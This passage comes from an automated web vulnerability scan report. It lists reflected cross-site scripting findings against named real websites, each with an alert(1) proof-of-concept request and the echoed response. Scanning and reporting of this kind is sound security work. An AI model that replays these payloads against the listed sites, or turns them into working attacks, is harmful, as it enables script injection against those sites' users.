User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:37:27 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=598721f11c15a95ed80a63beb47014fc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GEO-174_121_222_18=usa%3A%3Ahouston%3A%3A029.763%3A%3A-095.363%3A%3Abroadband%3A%3Atx; expires=Mon, 22-Nov-2010 21:37:27 GMT; path=/
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 62188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
" | Main Page";}

s_265.channel="us.style";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,stylelist.com";
s_265.prop12="http://www.stylelist.com/tag/SkinnyJeans/?87744"-alert(1)-"a1efa8aff4b=1";
s_265.mmxgo=true;
/* if ($bloggerslug!="") {
s_265.mmxtitle="Posts at StyleList";
}*/
s_265.t();
}
var s_account = "aolstylist,aolsvc";
(function(){
var d =
...[SNIP]...

1.412. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /tag/SkinnyJeans/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c344"><script>alert(1)</script>2198164e8fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/SkinnyJeans/?8c344"><script>alert(1)</script>2198164e8fd=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:37:25 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=81dcb6a36115d849c164757e87f589a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GEO-174_121_222_18=usa%3A%3Ahouston%3A%3A029.763%3A%3A-095.363%3A%3Abroadband%3A%3Atx; expires=Mon, 22-Nov-2010 21:37:25 GMT; path=/
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 62261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.stylelist.com/tag/SkinnyJeans/?8c344"><script>alert(1)</script>2198164e8fd=1" />
...[SNIP]...

1.413. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7daf6"><script>alert(1)</script>c9747c416fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7daf6"><script>alert(1)</script>c9747c416fe=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:37:36 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 21-Nov-2010 21:52:36 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="/css/styles.css?SRC=&7daf6"><script>alert(1)</script>c9747c416fe=1" rel="stylesheet" />
...[SNIP]...

1.414. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b5c'-alert(1)-'66c1d2b16c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a3b5c'-alert(1)-'66c1d2b16c1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:37:47 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Sun, 21-Nov-2010 21:52:48 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&a3b5c'-alert(1)-'66c1d2b16c1=1" rel="nofollow">
...[SNIP]...

1.415. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f1769--><script>alert(1)</script>c134d7b2996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?f1769--><script>alert(1)</script>c134d7b2996=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 21:38:09 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Sun, 21-Nov-2010 21:53:09 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&f1769--><script>alert(1)</script>c134d7b2996=1#" rel="nofollow">
...[SNIP]...

1.416. https://www.survey-xact.dk/LinkCollector [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.survey-xact.dk
Path:   /LinkCollector

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 7784f<script>alert(1)</script>2c6f007e0c6 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LinkCollector?key=N9R97TT5119K7784f<script>alert(1)</script>2c6f007e0c6 HTTP/1.1
Host: www.survey-xact.dk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:36:47 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 21:36:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 130
Connection: close

<html><title>SurveyXact</title><body>Cannot create respondent: N9R97TT5119K7784f<script>alert(1)</script>2c6f007e0c6</body></html>

1.417. http://www.thatsfit.com/2009/11/30/master-cleanse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsfit.com
Path:   /2009/11/30/master-cleanse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b254"><script>alert(1)</script>327833fa669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/11/30/master-cleanse/?3b254"><script>alert(1)</script>327833fa669=1 HTTP/1.1
Host: www.thatsfit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:36:15 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=88747a8141dfeaa975795f96db1d8648; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: comment_by_existing=deleted; expires=Sat, 21-Nov-2009 21:36:15 GMT; path=/
Keep-Alive: timeout=5, max=999957
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 77971


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<link rel="canonical" href="http://www.thatsfit.com/2009/11/30/master-cleanse/?3b254"><script>alert(1)</script>327833fa669=1"/>
...[SNIP]...

1.418. http://www.thinkgeek.com/electronics/home-entertainment/cf9b/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thinkgeek.com
Path:   /electronics/home-entertainment/cf9b/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17eac"a%3d"b"5eeff4b7abf was submitted in the REST URL parameter 2. This input was echoed as 17eac"a="b"5eeff4b7abf in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /electronics/home-entertainment17eac"a%3d"b"5eeff4b7abf/cf9b/ HTTP/1.1
Host: www.thinkgeek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
X-Geek-PageFetch: Yes
Expires: Sun, 21 Nov 2010 21:35:48 GMT
Content-Type: text/html
Content-Length: 51524
Date: Sun, 21 Nov 2010 21:35:48 GMT
X-Varnish: 99855017
Age: 0
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>


   <title>             ThinkGeek :: Magic Wand - Programmable TV Remote    </title
...[SNIP]...
<a href="/electronics/home-entertainment17eac"a="b"5eeff4b7abf/cf9b/action/213bbf8/">
...[SNIP]...

1.419. http://www.treasuryandrisk.com/Issues/2010/October-2010/Pages/Getting-a-Grip-on-Intangibles.aspx [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.treasuryandrisk.com
Path:   /Issues/2010/October-2010/Pages/Getting-a-Grip-on-Intangibles.aspx

Issue detail

The value of the k request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2a931'><script>alert(1)</script>0fbdc113263 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Issues/2010/October-2010/Pages/Getting-a-Grip-on-Intangibles.aspx?k=Deloitte2a931'><script>alert(1)</script>0fbdc113263 HTTP/1.1
Host: www.treasuryandrisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 231344
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 20:34:59 GMT
Last-Modified: Sun, 21 Nov 2010 21:34:59 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXAUTH=96C687AF75EAF1228BEE360E0F7558C1F365ED67A0C36EB5EF3285E1382CC66CD57CB01A56140FC92C6378568B7D3B25CCFD3FD46148D8F1E9AF0AAE5CF7A509384697D2703F4F40E04AD679C5A3BDB4; expires=Sun, 21-Nov-2010 22:04:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=kppok455ja5nfc45z5r3dk55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 21 Nov 2010 21:34:59 GMT
Connection: close

<html __expr-val-dir="ltr" dir="ltr">
<head><link rel="SHORTCUT ICON" href="http://www.treasuryandrisk.com/Style Library/images/sbm.ico" type="image/ico" /><meta name="GENERATOR" content="Microsoft S
...[SNIP]...
<input name='SearchTerms' id='SearchTerms' value='Deloitte2a931'><script>alert(1)</script>0fbdc113263' type='text' title='Enter search terms' alt='Enter search terms' onkeydown='javascript:return SearchBoxSearchOnEnter(event)'>
...[SNIP]...

1.420. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b942f"-alert(1)-"0fce9fc0f52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b942f"-alert(1)-"0fce9fc0f52=1 HTTP/1.1
Host: www.tuaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:34:49 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999942
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 90475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
.server="";
s_265.channel="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="Home";
s_265.prop12="http://www.tuaw.com/?b942f"-alert(1)-"0fce9fc0f52=1";
s_265.prop16="TUAW -- The Unofficial Apple Weblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="ntc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)docum
...[SNIP]...

1.421. http://www.twelvehorses.com/S1/RX1ANT/2LVIU6XP/M/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.twelvehorses.com
Path:   /S1/RX1ANT/2LVIU6XP/M/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fd83d<img%20src%3da%20onerror%3dalert(1)>759a1e7887a was submitted in the REST URL parameter 4. This input was echoed as fd83d<img src=a onerror=alert(1)>759a1e7887a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /S1/RX1ANT/2LVIU6XP/Mfd83d<img%20src%3da%20onerror%3dalert(1)>759a1e7887a/ HTTP/1.1
Host: www.twelvehorses.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Unknown request Mfd83d<img src=a onerror=alert(1)>759a1e7887a
Date: Sun, 21 Nov 2010 21:34:56 GMT
Server: Apache
Set-Cookie: JSESSIONID=KHX5LSIUXG1OFQFIAQ0CFEY;path=/
Content-Length: 150
Connection: close
Content-Type: text/html

<HEAD><TITLE>403 Forbidden</TITLE></HEAD>
<H1>403 Forbidden</H1><BODY>

Unknown request Mfd83d<img src=a onerror=alert(1)>759a1e7887a
<P>
</BODY>


1.422. http://www.universalorlando.com/merchandise/HPCategoryList.aspx [categoryName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.universalorlando.com
Path:   /merchandise/HPCategoryList.aspx

Issue detail

The value of the categoryName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7923"%3balert(1)//adb25866d07 was submitted in the categoryName parameter. This input was echoed as e7923";alert(1)//adb25866d07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /merchandise/HPCategoryList.aspx?parentCategory=harrypotter%28merchandisebasecatalog%29&categoryName=harrypotter%28merchandisebasecatalog%29e7923"%3balert(1)//adb25866d07 HTTP/1.1
Host: www.universalorlando.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 21:35:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=yjnoeh550s4sww3j3nbxd2vf; path=/; HttpOnly
Set-Cookie: Click2Click=USER_ID=50864001; expires=Sun, 22-Nov-2015 02:39:18 GMT; path=/
Set-Cookie: encrypted_store_cookie=pv54ayyvfhA5AnfRZw4zqNqjmR7/cLr2UB6R0pPvDyVTtZSFL7gKp7dFBB8BNBkpmYmUly8lVGkpqvw=; expires=Tue, 23-Nov-2010 21:35:29 GMT; path=/
Content-Length: 93335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--[if lt IE 7]>
<li
...[SNIP]...
y Landing";
s.channel="OLS";
s.prop2="Sales";
s.prop3="Merchandise";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop10=s.channel;
s.prop11="Resort Wide";
s.prop12="harrypottere7923";alert(1)//adb25866d07 ";
s.prop13="Sell Products";
s.prop14="Product Selection";
s.prop31="";
s.prop32="";
s.prop33="";
s.prop38="";
s.eVar1=s.prop1;
s.eVar3=s.prop16;
s.eVar8=s.channel;
s.eVar11=s.prop21
...[SNIP]...

1.423. http://www.universalorlando.com/merchandise/HPProductDetail.aspx [CategoryName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.universalorlando.com
Path:   /merchandise/HPProductDetail.aspx

Issue detail

The value of the CategoryName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2b4'%3balert(1)//3baada0924e was submitted in the CategoryName parameter. This input was echoed as cd2b4';alert(1)//3baada0924e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /merchandise/HPProductDetail.aspx?ProductId=39366a9a-28f4-4381-a53a-d97d68261639%28MerchandiseBaseCatalog%29&parentCategory=harrypotter%28merchandisebasecatalog%29&CategoryName=cd2b4'%3balert(1)//3baada0924e HTTP/1.1
Host: www.universalorlando.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 21:35:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=4uhshg451udzphvb4iy11eug; path=/; HttpOnly
Set-Cookie: Click2Click=USER_ID=50864064; expires=Sun, 22-Nov-2015 02:39:30 GMT; path=/
Set-Cookie: encrypted_store_cookie=ZS6pitvZzwMRDMafpS9JgSmgkXrnwKj+dmMA3AZXo6D2aw1WisjfAdUE7mYJNc0NFVx2GeQ6/NyK0/4=; expires=Tue, 23-Nov-2010 21:35:41 GMT; path=/
Content-Length: 134012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!--[if lt
...[SNIP]...
me='Product Details';
s.channel='OLS';
s.prop2='Sales';
s.prop3='Merchandise';
s.prop4='';
s.prop5='';
s.prop6='';
s.prop7='';
s.prop10=s.channel;
s.prop11='Resort Wide';
s.prop12='cd2b4';alert(1)//3baada0924e';
s.prop13='Sell Products';
s.prop14='Product Selection';
s.prop21='Merchandise';
s.prop22='Authentic Sneakoscope Reproduction';
s.prop31='';
s.prop32='';
s.prop33='';
s.prop38='';
s
...[SNIP]...

1.424. http://www.universalorlando.com/merchandise/HPProductDetail.aspx [CategoryName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.universalorlando.com
Path:   /merchandise/HPProductDetail.aspx

Issue detail

The value of the CategoryName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7cea5%3balert(1)//254af69b79b was submitted in the CategoryName parameter. This input was echoed as 7cea5;alert(1)//254af69b79b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /merchandise/HPProductDetail.aspx?ProductId=39366a9a-28f4-4381-a53a-d97d68261639%28MerchandiseBaseCatalog%29&parentCategory=harrypotter%28merchandisebasecatalog%29&CategoryName=HarryPotter|Zonko|Zonko%27s%28MerchandiseBaseCatalog%297cea5%3balert(1)//254af69b79b HTTP/1.1
Host: www.universalorlando.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134208
Date: Sun, 21 Nov 2010 21:35:42 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ypru0jexosnezleaqjrfp2qr; path=/; HttpOnly
Set-Cookie: Click2Click=USER_ID=50864069; expires=Sun, 22-Nov-2015 02:39:31 GMT; path=/
Set-Cookie: encrypted_store_cookie=Ie5KL6k6H4mS85GfpS9JgSmgkXrnwJ3HBgLSN3S4ikuc7REMftxSYbDRDXONEWXKCKcO9/fn1N58ifI=; expires=Tue, 23-Nov-2010 21:35:42 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!--[if lt
...[SNIP]...

s.prop12='harrypotter';
s.prop13='Sell Products';
s.prop14='Product Selection';
s.prop21='Merchandise';
s.prop22='Authentic Sneakoscope Reproduction';
s.prop31='zonko';
s.prop32='zonko's7cea5;alert(1)//254af69b79b';
s.prop33='';
s.prop38='';
s.eVar1=s.prop1;
s.eVar3=s.prop16;
s.eVar8=s.channel;
s.eVar11=s.prop21;
s.eVar12=s.prop22;
s.eVar13=s.prop31;
s.eVar14=s.prop32;
s.eVar15=s.prop33;
s
...[SNIP]...

1.425. http://www.universalorlando.com/merchandise/HPProductList.aspx [CategoryName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.universalorlando.com
Path:   /merchandise/HPProductList.aspx

Issue detail

The value of the CategoryName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b951f"%3balert(1)//2f8badf28b8 was submitted in the CategoryName parameter. This input was echoed as b951f";alert(1)//2f8badf28b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /merchandise/HPProductList.aspx?CategoryName=HarryPotter|Ollivanders|Collectibles%28MerchandiseBaseCatalog%29b951f"%3balert(1)//2f8badf28b8&parentCategory=harrypotter%28merchandisebasecatalog%29 HTTP/1.1
Host: www.universalorlando.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 21:35:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ntscke55sd5kr4iphkqwuj55; path=/; HttpOnly
Set-Cookie: Click2Click=USER_ID=50864043; expires=Sun, 22-Nov-2015 02:39:26 GMT; path=/
Set-Cookie: encrypted_store_cookie=VRELtdJL2M2wlYWfpS9JgSmgkXrnwHQeoOiH4wr3MKz7OhSFO1s7YPqdecjviLsi/izRO3CaUwi+1hk=; expires=Tue, 23-Nov-2010 21:35:37 GMT; path=/
Content-Length: 96009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--[if lt IE 7]>
<li
...[SNIP]...
.prop6="";
s.prop7="";
s.prop10=s.channel;
s.prop11="Resort Wide";
s.prop12="harrypotter";
s.prop13="Sell Products";
s.prop14="Product Selection";
s.prop31="ollivanders";
s.prop32="collectiblesb951f";alert(1)//2f8badf28b8";
s.prop33="";
s.prop38="";
s.eVar1=s.prop1;
s.eVar3=s.prop16;
s.eVar8=s.channel;
s.eVar11=s.prop21;
s.eVar12=s.prop22;
s.eVar13=s.prop31;
s.eVar14=s.prop32;
s.eVar15=s.prop33;
s.eVar17=s.p
...[SNIP]...

1.426. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdbriefs.com
Path:   /calendar/thyme/thyme/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7f8b'><img%20src%3da%20onerror%3dalert(1)>38d2c129f90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7f8b'><img src=a onerror=alert(1)>38d2c129f90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /calendar/thyme/thyme/index.php/a7f8b'><img%20src%3da%20onerror%3dalert(1)>38d2c129f90 HTTP/1.1
Host: www.usdbriefs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:36:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Set-Cookie: d51493120e269b3e123d4dfe3ef8003e=60cb340736fb5e2d68dde3866acdf8d0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 182957

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >

<html>
<head>
<meta http-equiv="Content-type: text/html; charset=UTF-8" />
